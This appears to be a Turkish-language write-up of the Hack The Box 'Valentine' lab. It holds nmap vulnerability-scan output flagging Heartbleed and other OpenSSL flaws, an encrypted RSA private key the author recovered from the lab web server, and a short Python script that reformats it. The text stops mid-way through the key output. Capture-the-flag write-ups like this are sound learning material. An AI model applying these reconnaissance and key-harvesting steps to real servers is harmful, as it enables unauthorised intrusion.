İçeriğe geç

Valentine

Makine Adı Seviye OS Logo
Valentine - HTB Orta Linux

Walkthrough

nmap taraması ile başlayalım.


PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:5.9p1: 
|       EDB-ID:21018    10.0    https://vulners.com/exploitdb/EDB-ID:21018  *EXPLOIT*
|       CVE-2001-0554   10.0    https://vulners.com/cve/CVE-2001-0554
|       EDB-ID:40888    7.8 https://vulners.com/exploitdb/EDB-ID:40888  *EXPLOIT*
|       CVE-2016-6244   7.8 https://vulners.com/cve/CVE-2016-6244
|       EDB-ID:41173    7.2 https://vulners.com/exploitdb/EDB-ID:41173  *EXPLOIT*
|       CVE-2016-6241   7.2 https://vulners.com/cve/CVE-2016-6241
|       CVE-2016-6240   7.2 https://vulners.com/cve/CVE-2016-6240
|       SSV:60656   5.0 https://vulners.com/seebug/SSV:60656    *EXPLOIT*
|       CVE-2018-15919  5.0 https://vulners.com/cve/CVE-2018-15919
|       CVE-2017-15906  5.0 https://vulners.com/cve/CVE-2017-15906
|       CVE-2010-5107   5.0 https://vulners.com/cve/CVE-2010-5107
|       CVE-2016-6522   4.9 https://vulners.com/cve/CVE-2016-6522
|       CVE-2016-6350   4.9 https://vulners.com/cve/CVE-2016-6350
|       CVE-2016-6247   4.9 https://vulners.com/cve/CVE-2016-6247
|       CVE-2016-6246   4.9 https://vulners.com/cve/CVE-2016-6246
|       CVE-2016-6245   4.9 https://vulners.com/cve/CVE-2016-6245
|       CVE-2016-6243   4.9 https://vulners.com/cve/CVE-2016-6243
|       CVE-2016-6242   4.9 https://vulners.com/cve/CVE-2016-6242
|       CVE-2016-6239   4.9 https://vulners.com/cve/CVE-2016-6239
|       SSV:90447   4.6 https://vulners.com/seebug/SSV:90447    *EXPLOIT*
|       EDB-ID:45233    4.6 https://vulners.com/exploitdb/EDB-ID:45233  *EXPLOIT*
|       EDB-ID:45210    4.6 https://vulners.com/exploitdb/EDB-ID:45210  *EXPLOIT*
|       EDB-ID:45001    4.6 https://vulners.com/exploitdb/EDB-ID:45001  *EXPLOIT*
|       EDB-ID:45000    4.6 https://vulners.com/exploitdb/EDB-ID:45000  *EXPLOIT*
|       EDB-ID:40963    4.6 https://vulners.com/exploitdb/EDB-ID:40963  *EXPLOIT*
|       EDB-ID:40962    4.6 https://vulners.com/exploitdb/EDB-ID:40962  *EXPLOIT*
|       CVE-2016-0778   4.6 https://vulners.com/cve/CVE-2016-0778
|       MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/  *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/  4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/  4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/  4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/   *EXPLOIT*
|       MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/   4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/    *EXPLOIT*
|       CVE-2020-14145  4.3 https://vulners.com/cve/CVE-2020-14145
|       CVE-2007-2768   4.3 https://vulners.com/cve/CVE-2007-2768
|       MSF:ILITIES/UBUNTU-CVE-2016-0777/   4.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2016-0777/    *EXPLOIT*
|       MSF:ILITIES/IBM-AIX-CVE-2016-0777/  4.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2016-0777/   *EXPLOIT*
|       MSF:ILITIES/DEBIAN-CVE-2016-0777/   4.0 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2016-0777/    *EXPLOIT*
|       MSF:ILITIES/AIX-7.2-OPENSSH_ADVISORY7_CVE-2016-0777/    4.0 https://vulners.com/metasploit/MSF:ILITIES/AIX-7.2-OPENSSH_ADVISORY7_CVE-2016-0777/ *EXPLOIT*
|       MSF:ILITIES/AIX-7.1-OPENSSH_ADVISORY7_CVE-2016-0777/    4.0 https://vulners.com/metasploit/MSF:ILITIES/AIX-7.1-OPENSSH_ADVISORY7_CVE-2016-0777/ *EXPLOIT*
|       MSF:ILITIES/AIX-5.3-OPENSSH_ADVISORY7_CVE-2016-0777/    4.0 https://vulners.com/metasploit/MSF:ILITIES/AIX-5.3-OPENSSH_ADVISORY7_CVE-2016-0777/ *EXPLOIT*
|_      CVE-2016-0777   4.0 https://vulners.com/cve/CVE-2016-0777
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.2.22: 
|       SSV:60913   7.5 https://vulners.com/seebug/SSV:60913    *EXPLOIT*
|       CVE-2017-7679   7.5 https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5 https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5 https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5 https://vulners.com/cve/CVE-2017-3167
|       CVE-2013-2249   7.5 https://vulners.com/cve/CVE-2013-2249
|       MSF:ILITIES/UBUNTU-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/LINUXRPM-RHSA-2013-1012/    6.8 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1012/ *EXPLOIT*
|       MSF:ILITIES/LINUXRPM-RHSA-2013-1011/    6.8 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1011/ *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2017-17790/    6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-17790/ *EXPLOIT*
|       MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/  *EXPLOIT*
|       CVE-2018-1312   6.8 https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-9788   6.4 https://vulners.com/cve/CVE-2017-9788
|       MSF:ILITIES/LINUXRPM-RHSA-2013-1208/    5.4 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1208/ *EXPLOIT*
|       MSF:ILITIES/LINUXRPM-RHSA-2013-1207/    5.4 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1207/ *EXPLOIT*
|       SSV:60788   5.1 https://vulners.com/seebug/SSV:60788    *EXPLOIT*
|       CVE-2013-1862   5.1 https://vulners.com/cve/CVE-2013-1862
|       SSV:96537   5.0 https://vulners.com/seebug/SSV:96537    *EXPLOIT*
|       SSV:62058   5.0 https://vulners.com/seebug/SSV:62058    *EXPLOIT*
|       SSV:61874   5.0 https://vulners.com/seebug/SSV:61874    *EXPLOIT*
|       MSF:ILITIES/SUSE-CVE-2014-0231/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2014-0231/  *EXPLOIT*
|       MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED  5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED   *EXPLOIT*
|       EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    *EXPLOIT*
|       CVE-2017-9798   5.0 https://vulners.com/cve/CVE-2017-9798
|       CVE-2014-0231   5.0 https://vulners.com/cve/CVE-2014-0231
|       CVE-2014-0098   5.0 https://vulners.com/cve/CVE-2014-0098
|       CVE-2013-6438   5.0 https://vulners.com/cve/CVE-2013-6438
|       CVE-2013-5704   5.0 https://vulners.com/cve/CVE-2013-5704
|       1337DAY-ID-28573    5.0 https://vulners.com/zdt/1337DAY-ID-28573    *EXPLOIT*
|       SSV:60905   4.3 https://vulners.com/seebug/SSV:60905    *EXPLOIT*
|       SSV:60657   4.3 https://vulners.com/seebug/SSV:60657    *EXPLOIT*
|       SSV:60653   4.3 https://vulners.com/seebug/SSV:60653    *EXPLOIT*
|       SSV:60345   4.3 https://vulners.com/seebug/SSV:60345    *EXPLOIT*
|       MSF:ILITIES/SUSE-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2012-4558/  *EXPLOIT*
|       MSF:ILITIES/SUSE-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2012-3499/  *EXPLOIT*
|       MSF:ILITIES/ORACLE-SOLARIS-CVE-2012-4558/   4.3 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2012-4558/    *EXPLOIT*
|       MSF:ILITIES/IBM-HTTP_SERVER-CVE-2012-3499/  4.3 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2012-3499/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/   4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/    *EXPLOIT*
|       MSF:ILITIES/HPUX-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HPUX-CVE-2012-4558/  *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-4558/  *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-3499/  *EXPLOIT*
|       MSF:ILITIES/APACHE-HTTPD-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2012-4558/  *EXPLOIT*
|       MSF:ILITIES/APACHE-HTTPD-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2012-3499/  *EXPLOIT*
|       CVE-2016-4975   4.3 https://vulners.com/cve/CVE-2016-4975
|       CVE-2013-1896   4.3 https://vulners.com/cve/CVE-2013-1896
|       CVE-2012-4558   4.3 https://vulners.com/cve/CVE-2012-4558
|       CVE-2012-3499   4.3 https://vulners.com/cve/CVE-2012-3499
|       CVE-2012-2687   2.6 https://vulners.com/cve/CVE-2012-2687
|_      EDB-ID:42745    0.0 https://vulners.com/exploitdb/EDB-ID:42745  *EXPLOIT*
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.openssl.org/news/secadv_20140605.txt
|_      http://www.cvedetails.com/cve/2014-0224
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt 
|       http://cvedetails.com/cve/2014-0160/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.securityfocus.com/bid/70574
|_sslv2-drown: 
| vulners: 
|   cpe:/a:apache:http_server:2.2.22: 
|       SSV:60913   7.5 https://vulners.com/seebug/SSV:60913    *EXPLOIT*
|       CVE-2017-7679   7.5 https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5 https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5 https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5 https://vulners.com/cve/CVE-2017-3167
|       CVE-2013-2249   7.5 https://vulners.com/cve/CVE-2013-2249
|       MSF:ILITIES/UBUNTU-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/LINUXRPM-RHSA-2013-1012/    6.8 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1012/ *EXPLOIT*
|       MSF:ILITIES/LINUXRPM-RHSA-2013-1011/    6.8 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1011/ *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2017-17790/    6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-17790/ *EXPLOIT*
|       MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/  *EXPLOIT*
|       CVE-2018-1312   6.8 https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-9788   6.4 https://vulners.com/cve/CVE-2017-9788
|       MSF:ILITIES/LINUXRPM-RHSA-2013-1208/    5.4 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1208/ *EXPLOIT*
|       MSF:ILITIES/LINUXRPM-RHSA-2013-1207/    5.4 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1207/ *EXPLOIT*
|       SSV:60788   5.1 https://vulners.com/seebug/SSV:60788    *EXPLOIT*
|       CVE-2013-1862   5.1 https://vulners.com/cve/CVE-2013-1862
|       SSV:96537   5.0 https://vulners.com/seebug/SSV:96537    *EXPLOIT*
|       SSV:62058   5.0 https://vulners.com/seebug/SSV:62058    *EXPLOIT*
|       SSV:61874   5.0 https://vulners.com/seebug/SSV:61874    *EXPLOIT*
|       MSF:ILITIES/SUSE-CVE-2014-0231/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2014-0231/  *EXPLOIT*
|       MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED  5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED   *EXPLOIT*
|       EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    *EXPLOIT*
|       CVE-2017-9798   5.0 https://vulners.com/cve/CVE-2017-9798
|       CVE-2014-0231   5.0 https://vulners.com/cve/CVE-2014-0231
|       CVE-2014-0098   5.0 https://vulners.com/cve/CVE-2014-0098
|       CVE-2013-6438   5.0 https://vulners.com/cve/CVE-2013-6438
|       CVE-2013-5704   5.0 https://vulners.com/cve/CVE-2013-5704
|       1337DAY-ID-28573    5.0 https://vulners.com/zdt/1337DAY-ID-28573    *EXPLOIT*
|       SSV:60905   4.3 https://vulners.com/seebug/SSV:60905    *EXPLOIT*
|       SSV:60657   4.3 https://vulners.com/seebug/SSV:60657    *EXPLOIT*
|       SSV:60653   4.3 https://vulners.com/seebug/SSV:60653    *EXPLOIT*
|       SSV:60345   4.3 https://vulners.com/seebug/SSV:60345    *EXPLOIT*
|       MSF:ILITIES/SUSE-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2012-4558/  *EXPLOIT*
|       MSF:ILITIES/SUSE-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2012-3499/  *EXPLOIT*
|       MSF:ILITIES/ORACLE-SOLARIS-CVE-2012-4558/   4.3 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2012-4558/    *EXPLOIT*
|       MSF:ILITIES/IBM-HTTP_SERVER-CVE-2012-3499/  4.3 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2012-3499/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/   4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/    *EXPLOIT*
|       MSF:ILITIES/HPUX-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HPUX-CVE-2012-4558/  *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-4558/  *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-3499/  *EXPLOIT*
|       MSF:ILITIES/APACHE-HTTPD-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2012-4558/  *EXPLOIT*
|       MSF:ILITIES/APACHE-HTTPD-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2012-3499/  *EXPLOIT*
|       CVE-2016-4975   4.3 https://vulners.com/cve/CVE-2016-4975
|       CVE-2013-1896   4.3 https://vulners.com/cve/CVE-2013-1896
|       CVE-2012-4558   4.3 https://vulners.com/cve/CVE-2012-4558
|       CVE-2012-3499   4.3 https://vulners.com/cve/CVE-2012-3499
|       CVE-2012-2687   2.6 https://vulners.com/cve/CVE-2012-2687
|_      EDB-ID:42745    0.0 https://vulners.com/exploitdb/EDB-ID:42745  *EXPLOIT*
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ssl-heartbleed açıkçası bunu en son denedim. Bu zafiyeti bilmeyenler için kısaca açıklayayim hedef sunucunun belleinden (sanırım 64kb'dı) veri okumunza izin sebep oluyor. Bir çok şey denedikten sonra bu zafiyete odaklandım.

http://10.10.10.79/dev/hype_key adresinde hex formatında bir veri vardı. Bu veriyi bupr decode ile asci formatına dönüştürünce bir anahtar elde ettim.

┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# cat key 
- - - - - B E G I N   R S A   P R I V A T E   K E Y - - - - - 

 P r o c - T y p e :   4 , E N C R Y P T E D 

 D E K - I n f o :   A E S - 1 2 8 - C B C , A E B 8 8 C 1 4 0 F 6 9 B F 2 0 7 4 7 8 8 D E 2 4 A E 4 8 D 4 6 

 D b P r O 7 8 k e g N u k 1 D A q l A N 5 j b j X v 0 P P s o g 3 j d b M F S 8 i E 9 p 3 U O L 0 l F 0 x f 7 P z m r k D a 8 R 

 5 y / b 4 6 + 9 n E p C M f T P h N u J R c W 2 U 2 g J c O F H + 9 R J D B C 5 U J M U S 1 / g j B / 7 / M y 0 0 M w x + a I 6 

 0 E I 0 S b O Y U A V 1 W 4 E V 7 m 9 6 Q s Z j r w J v n j V a f m 6 V s K a T P B H p u g c A S v M q z 7 6 W 6 a b R Z e X i 

 E b w 6 6 h j F m A u 4 A z q c M / k i g N R F P Y u N i X r X s 1 w / d e L C q C J + E a 1 T 8 z l a s 6 f c m h M 8 A + 8 P 

 O X B K N e 6 l 1 7 h K a T 6 w F n p 5 e X O a U I H v H n v O 6 S c H V W R r Z 7 0 f c p c p i m L 1 w 1 3 T g d d 2 A i G d 

 p H L J p Y U I I 5 P u O 6 x + L S 8 n 1 r / G W M q S O E i m N R D 1 j / 5 9 / 4 u 3 R O r T C K e o 9 D s T R q s 2 k 1 S H 

 Q d W w F w a X b Y y T 1 u x A M S l 5 H q 9 O D 5 H J 8 G 0 R 6 J I 5 R v C N U Q j w x 0 F I T j j M j n L I p x j v f q + E 

 p 0 g D 0 U c y l K m 6 r C Z q a c w n S d d H W 8 W 3 L x J m C x d x W 5 l t 5 d P j A k B Y R U n l 9 1 E S C i D 4 Z + u C 

 O l 6 j L F D 2 k a O L f u y e e 0 f Y C b 7 G T q O e 7 E m M B 3 f G I w S d W 8 O C 8 N W T k w p j c 0 E L b l U a 6 u l O 

 t 9 g r S o s R T C s Z d 1 4 O P t s 4 b L s p K x M M O s g n K l o X v n l P O S w S p W y 9 W p 6 y 8 X X 8 + F 4 0 r x l 5 

 X q h D U B h y k 1 C 3 Y P O i D u P O n M X a I p e 1 d g b 0 N d D 1 M 9 Z Q S N U L w 1 D H C G P P 4 J S S x X 7 B W d D K 

 a A n W J v F g l A 4 o F B B V A 8 u A P M f V 2 X F Q n j w U T 5 b P L C 6 5 t F s t o R t T Z 1 u S r u a i 2 7 k x T n L Q 

 + w Q 8 7 l M a d d s 1 G Q N e G s K S f 8 R / r s R K e e K c i l D e P C j e a L q t q x n h N o F t g 0 M x t 6 r 2 g b 1 E 

 A l o Q 6 j g 5 T b j 5 J 7 q u Y X Z P y l B l j N p 9 G V p i n P c 3 K p H t t v g b p t f i W E E s Z Y n 5 y Z P h U r 9 Q 

 r 0 8 p k O x A r X E 2 d j 7 e X + b q 6 5 6 3 5 O J 6 T q H b A l T Q 1 R s 9 P u l r S 7 K 4 S L X 7 n Y 8 9 / R Z 5 o S Q e 

 2 V W R y T Z 1 F f n g J S s v 9 + M f v z 3 4 1 l b z O I W m k 7 W f E c W c H c 1 6 n 9 V 0 I b S N A L n j T h v E c P k y 

 e 1 B s f S b s f 9 F g u U Z k g H A n n f R K k G V G 1 O V y u w c / L V j m b h Z z K w L h a Z R N d 8 H E M 8 6 f N o j P 

 0 9 n V j T a Y t W U X k 0 S i 1 W 0 2 w b u 1 N z L + 1 T g 9 I p N y I S F C F Y j S q i y G + W U 7 I w K 3 Y U 5 k p 3 C C 

 d Y S c z 6 3 Q 2 p Q a f x f S b u v 4 C M n N p d i r V K E o 5 n R R f K / i a L 3 X 1 R 3 D x V 8 e S Y F K F L 6 p q p u X 

 c Y 5 Y Z J G A p + J x s n I Q 9 C F y x I t 9 2 f r X z n s j h l Y a 8 s v b V N N f k / 9 f y X 6 o p 2 4 r L 2 D y E S p Y 

 p n s u k B C F B k Z H W N N y e N 7 b 5 G h T V C o d H h z H V F e h T u B r p + V u P q a q D v M C V e 1 D Z C b 4 M j A j 

 M s l f + 9 x K + T X E L 3 i c m I O B R d P y w 6 e / J l Q l V R l m S h F p I 8 e b / 8 V s T y J S e + b 8 5 3 z u V 2 q L 

 s u L a B M x Y K m 3 + z E D I D v e K P N a a W Z g E c q x y l C C / w U y U X l M J 5 0 N w 6 J N V M M 8 L e C i i 3 O E W 

 l 0 l n 9 L 1 b / N X p H j G a 8 W H H T j o I i l B 5 q N U y y w S e T B F 2 a w R l X H 9 B r k Z G 4 F c 4 g d m W / I z T 

 R U g Z k b M Q Z N I I f z j 1 Q u i l R V B m / F 7 6 Y / Y M r m n M 9 k / 1 x S G I s k w C U Q + 9 5 C G H J E 8 M k h D 3 

 - - - - - E N D   R S A   P R I V A T E   K E Y - - - - -

┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# cat convert.py 
dosya = open("key")
key = dosya.read().split("\n")
dosya.close()

for i in key:
    text = i.replace(" ","")
    if(text != ""):
        print(text)

┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# python3 convert.py
-----BEGINRSAPRIVATEKEY-----
Proc-Type:4,ENCRYPTED
DEK-Info:AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
